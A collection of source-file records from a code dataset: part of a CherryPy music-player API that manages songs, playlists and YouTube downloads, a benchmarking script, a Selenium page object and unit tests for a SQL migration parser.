[(string)]\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\tmyIDList = [m_utils.checkValidID(i) for i in m_utils.checkValidData(\"_id\", data, list)]\n\t\tfor i in myIDList:\n\t\t\tif self.musicDB().count({\"_id\": i}) == 0:\n\t\t\t\traise cherrypy.HTTPError(400, \"Song does not exist\")\n\n\t\t# sanitize the input\n\t\tmyQuery = {}\n\t\tfor key in [\"url\", \"type\", \"name\", \"artist\", \"album\", \"genre\", \"vol\", \"start\", \"end\"]:\n\t\t\tif key in data:\n\t\t\t\tif key == 
\"artist\":\n\t\t\t\t\tmyQuery[key] = []\n\t\t\t\t\tfor artist in m_utils.checkValidData(key, data, list):\n\t\t\t\t\t\tif isinstance(artist, str):\n\t\t\t\t\t\t\tmyQuery[key].append(artist)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\traise cherrypy.HTTPError(400, \"Invalid artist provided\")\n\t\t\t\telif key == \"type\":\n\t\t\t\t\tif m_utils.checkValidData(key, data, str) in m_utils.supportedTypes:\n\t\t\t\t\t\tmyQuery[key] = data[key]\n\t\t\t\t\telse:\n\t\t\t\t\t\traise cherrypy.HTTPError(400, \"Invalid data type provided\")\n\t\t\t\telif key in [\"vol\", \"start\", \"end\"]:\n\t\t\t\t\tmyQuery[key] = m_utils.checkValidData(key, data, int)\n\t\t\t\telse:\n\t\t\t\t\tmyQuery[key] = m_utils.checkValidData(key, data, str)\n\n\t\tmyQuery[\"date\"] = datetime.now()\n\t\tinserted = self.musicDB().update_many({\"_id\": {\"$in\": myIDList}}, {\"$set\": myQuery})\n\t\t#TODO: update artist, album, genre DBs\n\t\tprint(\"updated music:\", inserted.raw_result)\n\t\treturn m_utils.makeMusicQuery({\"_id\": myIDList}, self.musicDB())\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@authUser\n\tdef removeMusic(self):\n\t\t\"\"\"\n\t\tRemoves a list of songs from the database\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"music\": [(string of _id)]\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\tdata = m_utils.checkValidData(\"music\", data, list)\n\t\tmyData = []\n\t\tfor myID in data:\n\t\t\tmyData.append(m_utils.checkValidID(myID))\n\n\t\tself.musicDB().remove({\"_id\": {\"$in\": myData}})\n\t\t# now remove from all playlists\n\t\tself.playlistDB().update_many({}, {\n\t\t\t\"$pull\": {\"contents\": {\"$in\": myData}}\n\t\t});\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef addPlaylist(self):\n\t\t\"\"\"\n\t\tAdd a playlist to the database\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"name\": (string),\n\t\t\t\t\"contents\": [(_id)]\n\t\t\t}\n\n\t\tReturns:\n\t\t\t{\n\t\t\t\t\"_id\": (_id)\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tprint(\"adding playlist\");\n\t\tmyPlaylist = dict()\n\n\t\tmyPlaylist[\"name\"] = m_utils.checkValidData(\"name\", data, str)\n\t\tif len(myPlaylist[\"name\"]) == 0:\n\t\t\traise cherrypy.HTTPError(400, \"Invalid playlist name\")\n\t\tmyPlaylist[\"date\"] = datetime.now()\n\t\tcontentList = m_utils.checkValidData(\"contents\", data, list)\n\t\tmyContent = []\n\t\tfor song in contentList:\n\t\t\tif self.musicDB().count({\"_id\": m_utils.checkValidID(song)}) > 0:\n\t\t\t\tmyContent.append(song)\n\t\t\telse:\n\t\t\t\traise cherrypy.HTTPError(400, \"Invalid song ID\")\n\t\tmyPlaylist[\"contents\"] = myContent\n\t\tmyPlaylist[\"date\"] = datetime.now()\n\n\t\t# add to database\n\t\tinserted = self.playlistDB().insert(myPlaylist)\n\n\t\tmyPlaylist[\"_id\"] = str(inserted)\n\t\treturn m_utils.cleanRet(myPlaylist)\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef findPlaylist(self):\n\t\t\"\"\"\n\t\tReturns a list of playlists matching the query\n\n\t\tExpected input (no field present -> return all):\n\t\t\t{\n\t\t\t\t\"playlist_names\": [(string)],\n\t\t\t\t\"start_date\": (datetime),\n\t\t\t\t\"end_date\": 
(datetime),\n\t\t\t\t\"artist_names\": [(string)],\n\t\t\t\t\"song_names\": [(string)],\n\t\t\t\t\"album_names\": [(string)],\n\t\t\t\t\"genre_names\": [(string)],\n\t\t\t\t\"_id\": (string)\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\treturn m_utils.makePlaylistQuery(data, self.playlistDB(), self.musicDB())\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef editPlaylist(self):\n\t\t\"\"\"\n\t\tEdits the name or contents of a playlist\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"_id\": ObjectID,\n\t\t\t\t\"name\": (string) (optional),\n\t\t\t\t\"contents\": [(_id)] (optional)\n\t\t\t}\n\n\t\tReturns the resolved contents of the updated playlist\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\tprint(\"editing playlist\")\n\t\tmyID = m_utils.checkValidID(data)\n\t\tif self.playlistDB().count({\"_id\": myID}) == 0:\n\t\t\traise cherrypy.HTTPError(400, \"Playlist does not exist\")\n\n\t\tmyPlaylist = dict()\n\t\tif \"name\" in data:\n\t\t\tmyPlaylist[\"name\"] = m_utils.checkValidData(\"name\", data, str)\n\t\tif \"contents\" in data:\n\t\t\tcontentList = m_utils.checkValidData(\"contents\", data, list)\n\t\t\tmyContent = []\n\t\t\tfor song in contentList:\n\t\t\t\tif self.musicDB().count({\"_id\": m_utils.checkValidID(song)}) > 0:\n\t\t\t\t\tmyContent.append(ObjectId(song))\n\t\t\t\telse:\n\t\t\t\t\traise cherrypy.HTTPError(400, \"Invalid song ID\")\n\t\t\tmyPlaylist[\"contents\"] = myContent\n\t\tmyPlaylist[\"date\"] = datetime.now()\n\t\t# print(\"updating playlist with:\", myPlaylist)\n\n\t\tinserted = self.playlistDB().update_one({\"_id\": myID}, {\"$set\": myPlaylist})\n\t\tprint(\"updated playlist:\", inserted.raw_result)\n\t\treturn m_utils.cleanRet(self.playlistDB().find_one({\"_id\": myID}))\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@authUser\n\tdef removePlaylists(self):\n\t\t\"\"\"\n\t\tRemoves a list of playlists\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"playlists\": [(_id)]\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tif \"playlists\" in data:\n\t\t\tmyQuery = []\n\t\t\tfor i in data[\"playlists\"]:\n\t\t\t\tmyQuery.append(m_utils.checkValidID(i))\n\t\t\tself.playlistDB().delete_many({\"_id\": {\"$in\": myQuery}})\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, \"No data given\")\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\tdef checkStatus(self):\n\t\t\"\"\"\n\t\tChecks if the download thread is complete\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"name\": (string)\n\t\t\t}\n\n\t\tOutput:\n\t\t\t{\n\t\t\t\t\"completed\": (boolean)\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\tthreadName = m_utils.checkValidData(\"name\", data, str)\n\n\t\tif threadName not in downloadThreads:\n\t\t\treturn {\"completed\": True}\t#is this correct?\n\t\tif 
downloadThreads[threadName].isAlive():\n\t\t\treturn {\"completed\": False}\n\t\t#else thread is done, remove it and return true\n\t\tdownloadThreads[threadName].join()\n\t\tdel downloadThreads[threadName]\n\t\treturn {\"completed\": True}\n\n\tdef downloadTag(self, ytdl, dest, song, fmt):\n\t\tytdl.download([song[\"url\"]])\n\t\t# songInfo = ytdl.extract_info(song[\"url\"], download=True)\n\t\t# print(\"SONG DURATION:\", songInfo[\"duration\"])\n\t\ttargFile = os.path.join(dest, \"{}.{}\".format(song[\"name\"], fmt))\n\t\tos.rename(os.path.join(dest, \"{}.{}\".format(song[\"id\"], fmt)), targFile)\n\t\ttoTag = eyed3.load(targFile)\n\t\ttoTag.tag.title = song[\"name\"]\n\t\tif \"album\" in song:\n\t\t\ttoTag.tag.album = song[\"album\"]\n\t\tif \"artistStr\" in song:\n\t\t\ttoTag.tag.artist = song[\"artistStr\"]\n\t\tif \"genre\" in song:\n\t\t\ttoTag.tag.genre = song[\"genre\"]\n\t\ttoTag.tag.save()\n\n\tdef multiDownloadTag(self, ytdl, dest, songs, fmt):\n\t\tthreads = []\n\t\tfor s in songs:\n\t\t\tt = threading.Thread(target=self.downloadTag, args=(ytdl, dest, s, fmt))\n\t\t\tthreads.append(t)\n\t\t\tt.start()\n\t\tfor t in threads:\n\t\t\tt.join()\n\n\tdef setupDownload(self, randDir, name, songs, type, totalDuration):\n\t\t#start measuring for time to download, convert, and package\n\t\tstart = time.perf_counter()\n\t\tdownloadDir = os.path.join(DOWNLOAD_FOLDER, randDir)\n\t\tif not os.path.exists(downloadDir):\n\t\t\tos.makedirs(downloadDir)\n\t\tyt_opts = {\n\t\t\t\"format\": \"bestaudio\",\n\t\t\t\"postprocessors\": [{\n\t\t\t\t\"key\": \"FFmpegExtractAudio\",\n\t\t\t\t\"preferredcodec\": type,\n\t\t\t\t\"preferredquality\": \"0\"\n\t\t\t}],\n\t\t\t\"outtmpl\": os.path.join(downloadDir, \"%(id)s.%(ext)s\")\n\t\t}\n\t\t#download\n\t\twith youtube_dl.YoutubeDL(yt_opts) as ydl:\n\t\t\tself.multiDownloadTag(ydl, downloadDir, songs, type)\n\t\t# now zip if multiple\n\t\tif len(songs) > 1:\n\t\t\tretName = os.path.join(downloadDir, \"{}.zip\".format(name))\n\t\t\twith zipfile.ZipFile(retName, \"w\", zipfile.ZIP_DEFLATED) as myZip:\n\t\t\t\tfor f in glob.glob(os.path.join(downloadDir, \"*.{}\".format(type))):\n\t\t\t\t\tmyZip.write(f, os.path.basename(f))\n\t\t\t\t\tos.remove(f)\n\t\t#calculate exponential moving average\n\t\texec_time = round((time.perf_counter() - start) * 1000 / totalDuration)\n\t\tprint(\"Average time of execution per second of video:\", exec_time)\n\t\tglobal avgDelay\n\t\tavgDelay = round(alpha * exec_time + (1 - alpha) * avgDelay)\n\t\tprint(\"New average delay:\", avgDelay)\n\n\t@cherrypy.expose\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\t@authUser\n\tdef generate(self):\n\t\t\"\"\"\n\t\tDownloads a lists of songs from youtube and prepares them for client side download\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"name\": (string),\n\t\t\t\t\"songs\": [(Music dict)],\n\t\t\t\t\"type\": \"mp3\" or \"mp4\"\n\t\t\t}\n\n\t\tOutput:\n\t\t\t{\n\t\t\t\t\"path\": (path to file or zipfile)\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tfor key in [\"name\", \"songs\", \"type\"]:\n\t\t\tif key not in data:\n\t\t\t\traise cherrypy.HTTPError(400, \"Invalid download parameters\")\n\t\t\tif key != \"songs\":\n\t\t\t\tm_utils.checkValidData(key, data, str)\n\t\t\telse:\n\t\t\t\tfor s in m_utils.checkValidData(key, data, list):\n\t\t\t\t\t# print(s)\n\t\t\t\t\tif 
isinstance(s, dict):\n\t\t\t\t\t\tfor u in s:\n\t\t\t\t\t\t\tif u in [\"url\", \"id\", \"name\", \"album\", \"artistStr\", \"genre\"]:\n\t\t\t\t\t\t\t\t# print(u)\n\t\t\t\t\t\t\t\tm_utils.checkValidData(u, s, str)\n\t\t\t\t\t\t# print(\"passed\")\n\t\t\t\t\t\tfor k in [\"url\", \"id\", \"name\"]:\n\t\t\t\t\t\t\tif k not in s:\n\t\t\t\t\t\t\t\traise cherrypy.HTTPError(400, \"Missing {} key\".format(k))\n\t\t\t\t\telse:\n\t\t\t\t\t\traise cherrypy.HTTPError(400, \"Invalid data download\")\n\t\tif data[\"type\"] in [\"mp3\", \"mp4\"]:\n\t\t\trandDir = str(uuid4())\n\t\t\t#precompute the return paths\n\t\t\tdownloadDir = os.path.join(DOWNLOAD_FOLDER, randDir)\n\t\t\tif len(data[\"songs\"]) > 1:\n\t\t\t\tfileName = os.path.join(downloadDir, \"{}.zip\".format(data[\"name\"]))\n\t\t\telse:\n\t\t\t\tfileName = os.path.join(downloadDir, \"{}.{}\".format(data[\"name\"], data[\"type\"]))\n\t\t\t#get the total song duration\n\t\t\ttotalDuration = 0\t#in seconds\n\t\t\tfor s in data[\"songs\"]:\n\t\t\t\tsongInfo = youtube_dl.YoutubeDL({\"format\": \"worst\"}).extract_info(s[\"url\"], process=False, download=False)\n\t\t\t\tprint(\"SONG DURATION:\", songInfo[\"duration\"])\n\t\t\t\ttotalDuration += songInfo[\"duration\"]\n\t\t\t#start the download process\n\t\t\tt = threading.Thread(target=self.setupDownload, args=(randDir, data[\"name\"], data[\"songs\"], data[\"type\"], totalDuration))\n\t\t\tdownloadThreads[fileName] = t\n\t\t\tt.start()\n\t\t\t#return the info\n\t\t\treturn {\"path\": fileName, \"expected\": totalDuration * avgDelay + networkDelay}\n\t\t# if \"songs\" in data and \"type\" in data and data[\"type\"] in [\"mp3\", \"mp4\"]:\n\t\t# \trandDir = str(uuid4())\n\t\t# \tdownloadDir = os.path.join(DOWNLOAD_FOLDER, randDir)\n\t\t# \tif not os.path.exists(downloadDir):\n\t\t# \t\tos.makedirs(downloadDir)\n\t\t# \tyt_opts = {\n\t\t# \t\t\"format\": \"bestaudio\",\n\t\t# \t\t\"postprocessors\": [{\n\t\t# \t\t\t\"key\": \"FFmpegExtractAudio\",\n\t\t# \t\t\t\"preferredcodec\": data[\"type\"],\n\t\t# \t\t\t\"preferredquality\": \"0\"\n\t\t# \t\t}],\n\t\t# \t\t\"outtmpl\": os.path.join(downloadDir, \"%(id)s.%(ext)s\")\n\t\t# \t}\n\t\t# \t#download\n\t\t# \twith youtube_dl.YoutubeDL(yt_opts) as ydl:\n\t\t# \t\tself.multiDownloadTag(ydl, downloadDir, data[\"songs\"], data[\"type\"])\n\t\t# \t# now zip if multiple\n\t\t# \tretName = \"\"\n\t\t# \tif len(data[\"songs\"]) > 1:\n\t\t# \t\tretName = os.path.join(downloadDir, \"{}.zip\".format(data[\"name\"]))\n\t\t# \t\twith zipfile.ZipFile(retName, \"w\", zipfile.ZIP_DEFLATED) as myZip:\n\t\t# \t\t\tfor f in glob.glob(os.path.join(downloadDir, \"*.{}\".format(data[\"type\"]))):\n\t\t# \t\t\t\tmyZip.write(f, os.path.basename(f))\n\t\t# \t\t\t\tos.remove(f)\n\t\t# \telse:\n\t\t# \t\tretName = os.path.join(downloadDir, \"{}.{}\".format(data[\"name\"], data[\"type\"]))\n\t\t# \treturn {\"path\": retName}\n\t\t# \t# return cherrypy.lib.static.serve_download(os.path.join(absDir, retName), os.path.basename(retName))\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, \"Missing download data\")\n\n\tdef cleanupDownloads(self):\n\t\tprint(\"Started download cleanup thread\")\n\t\t# while True:\n\t\t\t# time.sleep(downloadCleanupDelay)\n\t\tglobal exit\n\t\twhile not exit.is_set():\n\t\t\tprint(\"cleaning downloads\")\n\t\t\tfor f_name in list(downloadUIDFolders.keys()):\n\t\t\t\tif (time.perf_counter() - downloadUIDFolders[f_name]) > downloadCleanupDelay:\t#can cleanup\n\t\t\t\t\tshutil.rmtree(os.path.join(DOWNLOAD_FOLDER, f_name), ignore_errors=True)\n\t\t\t\t\tdel 
downloadUIDFolders[f_name]\n\t\t\texit.wait(downloadCleanupDelay)\t#equivalent of sleep, but interruptible\n\n\t@cherrypy.expose\n\t@authUser\n\tdef download(self, *argv):\n\t\tprint(\"DOWNLOADING\", argv)\n\t\ttargetPath = os.path.join(*argv)\n\t\tif argv[0] != DOWNLOAD_FOLDER or not os.path.exists(targetPath) or len(argv) != 3:\t#(DOWNLOAD_FOLDER, uuid, file name)\n\t\t\traise cherrypy.HTTPError(404, \"File not found\")\n\t\tres = cherrypy.lib.static.serve_download(os.path.join(absDir, targetPath), os.path.basename(targetPath))\n\t\tdownloadUIDFolders[argv[1]] = time.perf_counter()\n\t\t# shutil.rmtree(os.path.join(argv[0], argv[1]), ignore_errors=True)\t#this removes after serving, but may remove prematurely\n\t\treturn res\n\n\t@cherrypy.expose\n\t@authUser\n\t@cherrypy.tools.json_in()\n\tdef setLast(self):\n\t\t\"\"\"\n\t\tSets the last played playlist\n\n\t\tExpected input:\n\t\t\t{\n\t\t\t\t\"unset\": (boolean, optional),\n\t\t\t\t\"_id\": (_id, optional),\n\t\t\t\t\"name\": (string, optional),\n\t\t\t\t\"contents\": [(dict)] (optional),\t#order is important; will store the shuffled order\n\t\t\t\t\"startIndex\": (int, optional),\n\t\t\t\t\"touched\": (boolean, optional),\n\t\t\t\t\"renamed\": (str, optional),\n\t\t\t\t\"loop\": (boolean, optional),\n\t\t\t\t\"shuffle\": (boolean, optional)\n\t\t\t}\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\t# sanitize the input\n\t\tmyQuery = {\n\t\t\t\"user\": self.getUser(),\n\t\t\t# \"playlist\": {}\n\t\t}\n\t\tunset = {}\n\n\t\tif \"unset\" in data:\n\t\t\tunset = {\"playlist._id\": \"\"}\n\t\tif \"_id\" in data:\n\t\t\tmyQuery[\"playlist._id\"] = m_utils.checkValidID(data, False)\t\t#don't store as ObjectId\n\t\tif \"name\" in data:\n\t\t\tmyQuery[\"playlist.name\"] = m_utils.checkValidData(\"name\", data, str)\n\t\tif \"contents\" in data:\n\t\t\tmyQuery[\"playlist.contents\"] = m_utils.checkValidData(\"contents\", data, list)\n\t\tif \"startIndex\" in data:\n\t\t\tmyQuery[\"playlist.startIndex\"] = m_utils.checkValidData(\"startIndex\", data, int)\n\t\tif \"touched\" in data:\n\t\t\tmyQuery[\"playlist.touched\"] = m_utils.checkValidData(\"touched\", data, bool)\n\t\tif \"renamed\" in data:\n\t\t\tmyQuery[\"playlist.renamed\"] = m_utils.checkValidData(\"renamed\", data, str)\n\t\tif \"loop\" in data:\n\t\t\tmyQuery[\"loop\"] = m_utils.checkValidData(\"loop\", data, bool)\n\t\tif \"shuffle\" in data:\n\t\t\tmyQuery[\"shuffle\"] = m_utils.checkValidData(\"shuffle\", data, bool)\n\n\t\tupdateQ = {}\n\t\tif len(unset) > 0:\n\t\t\tupdateQ[\"$unset\"] = unset\n\t\tif len(myQuery) > 1:\n\t\t\tupdateQ[\"$set\"] = myQuery\n\t\tif len(updateQ) > 0:\n\t\t\tself.colLast.update_one({\"user\": self.getUser()}, updateQ, upsert=True)\n\n\t@cherrypy.expose\n\t@authUser\n\t@cherrypy.tools.json_out()\n\tdef getLast(self):\n\t\t\"\"\"\n\t\tGets the last played playlist\n\t\t\"\"\"\n\t\tresult = self.colLast.find_one({\"user\": self.getUser()})\n\t\tif result is None:\n\t\t\treturn\n\t\t# result = result[\"playlist\"]\n\t\tif \"name\" not in result[\"playlist\"] or \"contents\" not in result[\"playlist\"]:\n\t\t\treturn\n\n\t\tdel result[\"_id\"]\n\t\treturn result\n\n\t@cherrypy.expose\n\t@authUser\n\t@cherrypy.tools.json_in()\n\t@cherrypy.tools.json_out()\n\tdef getRecc(self):\n\t\t\"\"\"\n\t\tGets the HTML page for a requested video ID\n\t\t\"\"\"\n\t\t# check that we actually have json\n\t\tif 
hasattr(cherrypy.request, 'json'):\n\t\t\tdata = cherrypy.request.json\n\t\telse:\n\t\t\traise cherrypy.HTTPError(400, 'No data was given')\n\n\t\turlType = m_utils.checkValidData(\"type\", data, str)\n\t\tif urlType == \"youtube\":\n\t\t\tattempts = 0\n\t\t\tfailed = False\n\t\t\twhile (attempts < 3):\n\t\t\t\tprint(\"ATTEMPT:\", attempts)\n\t\t\t\ts = requests.Session()\n\t\t\t\ts.cookies.set_policy(BlockAll())\n\t\t\t\tresp = s.get(m_utils.ytBaseWatch + m_utils.checkValidData(\"vid\", data, str)).text\n\t\t\t\t#filter out only the recommended\n\t\t\t\tret = \"\"\n\t\t\t\turlSet = set()\n\t\t\t\tfailed = False\n\t\t\t\tfor node in HTMLParser(resp).css(\"li.video-list-item.related-list-item.show-video-time.related-list-item-compact-video\"):\n\t\t\t\t\t#only add if URL not in the set\n\t\t\t\t\tcurUrl = node.css_first(\"a\").attributes[\"href\"]\n\t\t\t\t\tif curUrl in urlSet:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\turlSet.add(curUrl)\n\t\t\t\t\tfor n in node.css(\"a, img\"):\n\t\t\t\t\t\tn.attrs[\"href\"] = m_utils.ytBase + curUrl\n\t\t\t\t\t#remove the .gif src in the img tag\n\t\t\t\t\tthumbnail = node.css_first(\"img\")\n\t\t\t\t\tthumbnail.attrs[\"src\"] = thumbnail.attributes[\"data-thumb\"]\n\t\t\t\t\t#remove the duration span\n\t\t\t\t\tdurSpan = node.css_first(\".content-wrapper > a > span:contains(Duration)\")\n\t\t\t\t\tif durSpan:\n\t\t\t\t\t\tdurSpan.decompose()\n\t\t\t\t\t#remove the view count\n\t\t\t\t\tviewSpan = node.css_first(\".content-wrapper > a > span.stat.view-count\")\n\t\t\t\t\tif viewSpan:\n\t\t\t\t\t\tviewSpan.decompose()\n\t\t\t\t\t#replace the li with a container div\n\t\t\t\t\tret += '
<div>'\n\t\t\t\t\tfor n in node.iter():\n\t\t\t\t\t\tif n.html == \"\":\n\t\t\t\t\t\t\tfailed = True\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tret += n.html\n\t\t\t\t\tret += \"</div>\"\n\t\t\t\t\tif failed:\n\t\t\t\t\t\tprint(\"FAILED TO GET RECC\")\n\t\t\t\t\t\tret = \"\"\n\t\t\t\t\t\tbreak\n\t\t\t\tattempts += 1\n\t\t\tif failed:\n\t\t\t\tret = '<div>No recommended data</div>'\n\t\t\tprint(ret)\n\t\t\treturn {\"contents\": ret}\n\t\telse:\n\t\t\treturn {\"contents\": \"'<div>No recommended data</div>
'\"}","repo_name":"marcusdeng22/music_player","sub_path":"src/python/music_player/apigateway.py","file_name":"apigateway.py","file_ext":"py","file_size_in_byte":28917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"15706885154","text":"import random\nfrom benchmark import BenchmarkSpace, run_benchmark\nfrom jewels import CountingStrategy, Naive, SumBuiltin\nfrom jewels import NaiveSlicing, SumSlicing, OneLiner, Cached\n\n\nNB_BOXES = 999\nSEED = 1659813756\nCANDIDATES: list[CountingStrategy] = [\n Naive(), SumBuiltin(), NaiveSlicing(), SumSlicing(), OneLiner(), Cached()\n]\nNB_QUERIES: list[int] = [250, 500, 750, 1000]\nQUERY_LENGTHS: list[int] = [50, 100, 200, 300, 400, 500]\n\ndef main():\n # Initializing the randome seed once and for all!\n random.seed(SEED)\n space = BenchmarkSpace(NB_BOXES)\n space.with_nb_queries(NB_QUERIES)\\\n .with_queries_length(QUERY_LENGTHS)\\\n .with_strategies(CANDIDATES)\n run_benchmark(space)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ace-lectures/SFWRENG_3XB3","sub_path":"lectures/03_optim/benchmark_sequential.py","file_name":"benchmark_sequential.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"11460733606","text":"from page_objects.base_page import BasePage\nfrom .locators import CertificadoLocator\nfrom utils.file_utils import FileUtils\nimport time\nfrom selenium.common.exceptions import TimeoutException\n\n\n\nclass Certificado(BasePage):\n def __init__(self, driver):\n super().__init__(driver)\n self.__locators = CertificadoLocator()\n\n def completar_info_basica(self, img, fecha):\n time.sleep(5)\n self.driver.execute_script(\n '$(\"#fecha_certificado\").val(\"'+fecha+'\")')\n time.sleep(5)\n self.find_element(self.__locators.AGREGAR_IMG_BTN).click()\n FileUtils.seleccionar_img_gui(img)\n self.find_element(self.__locators.TERMIN_CONDIC_INP).click()\n self.find_element(self.__locators.ACEPTAR_BTN).click()\n try:\n self.find_element(self.__locators.ACEPTAR_ADV_BTN).click()\n except TimeoutException:\n pass\n\n","repo_name":"Valupiruiz/AutomationPHP","sub_path":"CDocente/page_objects/certificados/certificado.py","file_name":"certificado.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"3856953811","text":"from subprocess import Popen, PIPE\nimport unittest\nfrom nose.tools import *\n\nfrom dbsync import *\n\n\nclass ParseMigrationCode(unittest.TestCase):\n\n def test_up_and_down_annotations(self):\n migration = parse_migration_code('''\n -- @UP\n CREATE TABLE users\n -- @DOWN\n DROP TABLE users\n ''')\n assert_equals({'up': 'CREATE TABLE users', 'down': 'DROP TABLE users'}, migration)\n\n def test_one_annotation_missing(self):\n migration = parse_migration_code('''\n -- @UP\n CREATE TABLE users\n ''')\n assert_equals({'up': 'CREATE TABLE users', 'down': None}, migration, \n 'Missing @DOWN')\n\n migration = parse_migration_code('''\n -- @DOWN\n DROP TABLE users\n ''')\n assert_equals({'up': None, 'down': 'DROP TABLE users'}, migration, \n 'Missing @UP')\n\n def test_no_annotations(self):\n assert_equals({'up': None, 'down': None}, parse_migration_code(''))\n\n def test_annotation_like_literals_in_sql_statements(self):\n migration = parse_migration_code('''\n -- @UP\n INSERT INTO users VALUES (NULL, \"-- @DOWN\")\n -- @DOWN\n DELETE FROM users\n ''')\n expected = {\n 'up': 
'INSERT INTO users VALUES (NULL, \"-- @DOWN\")',\n 'down': 'DELETE FROM users'\n }\n assert_equals(expected, migration)\n\n\nclass ExtractVersionFromName(unittest.TestCase):\n\n def test_extracts_version_from_filename(self):\n assert_equals(20130307005200, extract_version_from_name('20130307005200_foo.sql'))\n\n def test_extracts_version_from_filepath(self):\n assert_equals(\n 20130307005200, \n extract_version_from_name('path/to/20130307005200_foo.sql'))\n\n\nclass SelectApplicableChanges(unittest.TestCase):\n\n def test_no_target_version_no_schema_version(self):\n \"\"\"Selects all up changes\"\"\"\n migrations = [\n {'version': 1, 'up': 'UP 1', 'down': 'DOWN 1'},\n {'version': 2, 'up': 'UP 2', 'down': 'DOWN 2'},\n {'version': 3, 'up': 'UP 3', 'down': 'DOWN 3'},\n ]\n expected = [\n (1, 'UP 1'), (2, 'UP 2'), (3, 'UP 3')\n ]\n assert_equals(expected, select_applicable_changes(migrations))\n\n def test_no_target_version_but_preset_schema_version(self):\n \"\"\"Selects all up changes above schema version\"\"\"\n migrations = [\n {'version': 1, 'up': 'UP 1', 'down': 'DOWN 1'},\n {'version': 2, 'up': 'UP 2', 'down': 'DOWN 2'},\n {'version': 3, 'up': 'UP 3', 'down': 'DOWN 3'},\n ]\n expected = [\n (3, 'UP 3')\n ]\n assert_equals(\n expected, \n select_applicable_changes(migrations, schema_version=2))\n\n def test_target_version_above_schema_version(self):\n \"\"\"Selects up changes above schema version upto and including target\"\"\"\n migrations = [\n {'version': 1, 'up': 'UP 1', 'down': 'DOWN 1'},\n {'version': 2, 'up': 'UP 2', 'down': 'DOWN 2'},\n {'version': 3, 'up': 'UP 3', 'down': 'DOWN 3'},\n ]\n expected = [\n (2, 'UP 2'), (3, 'UP 3')\n ]\n assert_equals(\n expected, \n select_applicable_changes(migrations, schema_version=1, target_version=3))\n\n def test_target_version_below_schema_version(self):\n \"\"\"Selects down changes from below schema version downto but not including target\"\"\"\n migrations = [\n {'version': 1, 'up': 'UP 1', 'down': 'DOWN 1'},\n {'version': 2, 'up': 'UP 2', 'down': 'DOWN 2'},\n {'version': 3, 'up': 'UP 3', 'down': 'DOWN 3'},\n ]\n expected = [\n (3, 'DOWN 3'), (2, 'DOWN 2')\n ]\n assert_equals(\n expected, \n select_applicable_changes(migrations, schema_version=3, target_version=1))\n\n def test_target_version_equal_schema_version(self):\n \"\"\"Selects nothing\"\"\"\n migrations = [\n {'version': 1, 'up': 'UP 